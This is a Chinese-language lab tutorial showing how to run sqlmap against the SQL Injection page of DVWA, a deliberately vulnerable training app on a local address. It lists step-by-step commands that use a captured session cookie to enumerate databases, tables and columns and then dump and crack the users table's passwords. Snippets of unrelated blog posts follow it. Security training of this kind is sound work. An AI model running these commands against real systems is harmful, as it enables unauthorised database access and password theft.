使用sqlmap注入DVWA的SQL Injection菜单
1 使用sqlmap注入DVWA的SQL Injection菜单
本教程中的登陆地址:http://192.168.0.112/dvwa/login.php
1.1 获取cookie信息
1) 使用admin/password登陆系统,通过firebug工具获取cookie信息。
得到的cookie信息如下:
security=low; path=/dvwa/; domain=192.168.0.112
PHPSESSID=0bec860709d15f590768b7713c69b52f; path=/; domain=192.168.0.112
2) 获取要测试的url
点击SQL Injection菜单,在User ID输入框内输入aa,点击submit按钮。通过firebug工具获取待测试的url如下: http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#
3) 使用sqlmap测试该url是否存在sql注入漏洞
执行如下命令: root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f'
4) 探测MYSQL中用来存放应用数据的数据库名称
执行如下命令:root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' --dbs -v 0
5) 查询出dvwa数据库中存在的表名
执行如下命令:root@Kali-Linux:~# root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' -D dvwa --tables
6) 得到users表中的字段列表
执行如下命令:root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' -D dvwa --tables -T users --columns
7) 导出users表
执行如下命令:root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' -D dvwa --tables -T users --columns --dump
一路y下来,竟然来数据库中的密文密码也给破译了。。
根据提示路径下载users.csv即可
使用sqlmap注入DVWA的SQL Injection菜单的更多相关文章
- 【DVWA】SQL Injection(SQL 注入)通关教程
日期:2019-07-28 20:43:48 更新: 作者:Bay0net 介绍: 0x00.基本信息 关于 mysql 相关的注入,传送门. SQL 注入漏洞之 mysql - Bay0net - ...
- DVWA之SQL Injection
SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害是巨大的,常常 ...
- DVWA之 SQL Injection(Blind)
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法 ...
- [SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION
FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION 这里先介绍一下POSTGRESQL.这是一款数据库管理系统,与oracle是同类型软件.08年左右的市场 ...
- [SQL注入1]From SQL injection to Shell
第一次写,希望大神们多指点. 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习.网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTE ...
- Sqlmap对dvwa进行sql注入测试
前提准备条件: 1.下载安装dvwa,下载链接地址:http://www.dvwa.co.uk/.2.需要安装python运行环境.3.下载sqlmap包并将其解压. 一.查看所有的数据库;(其中db ...
- DVWA(三):SQL injection 全等级SQL注入
(本文不定期更新) 一.所需环境: 1.DVWA 2.web环境 phpstudy/wamp 3.burp suite 二.SQL注入产生的原因: 程序员在编写代码的时候,没有对用户输入数据的合法性进 ...
- DVWA SQL Injection 通关教程
SQL Injection,即SQL注入,SQLi,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害巨大,常常会导致整个数据库被“脱 ...
- [SQL SERVER系列]读书笔记之SQL注入漏洞和SQL调优
最近读了程序员的SQL金典这本书,觉得里面的SQL注入漏洞和SQL调优总结得不错,下面简单讨论下SQL注入漏洞和SQL调优. 1. SQL注入漏洞 由于“'1'='1'”这个表达式永远返回 true, ...
随机推荐
- PC-经典之“运行里面的密密”
msconfig.exe 你自己往里面输入这个字母就可以看到了,试试看,还有,我这里有一些可以在"运行"栏里输入的命令,一并给你: 以下为Windows操作系统的常用运行命令,执行 ...
- A Tour of Go Forever
If you omit the loop condition it loops forever, so an infinite loop is compactly(简洁地:紧密地:细密地) expre ...
- A Tour of Go For continued
As in C or Java, you can leave the pre and post statements empty. package main import "fmt" ...
- Java 网络编程最佳实践(转载)
http://yihongwei.com/2015/09/remoting-practice/ Java 网络编程最佳实践 Sep 10, 2015 | [Java, Network] 1. 通信层 ...
- android 处理图片之--bitmap处理
-2.从资源中获得bitmap Resources res=getResources(); Bitmap bmp=BitmapFactory.decodeResource(res, R.drawabl ...
- AWS s3 python sdk code examples
Yet another easy-to-understand, easy-to-use aws s3 python sdk code examples. github地址:https://github ...
- the third assignment of software testing
没有网的日子不好过,Junit4下不下来,先用androidTestCase实现一个. 遇到了几个bug. 首先是除0问题. public void testDivide(){ result=calc ...
- SVN修改已提交版本的日志
在工作中一直是使用svn进行项目的版本控制的,有时候由于提交匆忙,或是忘了添加Log,或是Log内容写的有错误.今日遇到此类情况,想要在查看项目的日志时添加log或是修改log内容,遇到如下错误:Re ...
- java Spring 生命周期
1.初始化回调 <bean name="userService" class="com.sun.service.UserService" init-met ...
- java Spring集合
在进行输入的时候一定要给属性配置set方法,因为不设置是注入不了的. 1.list UserService.java private ArrayList arr; public ArrayList g ...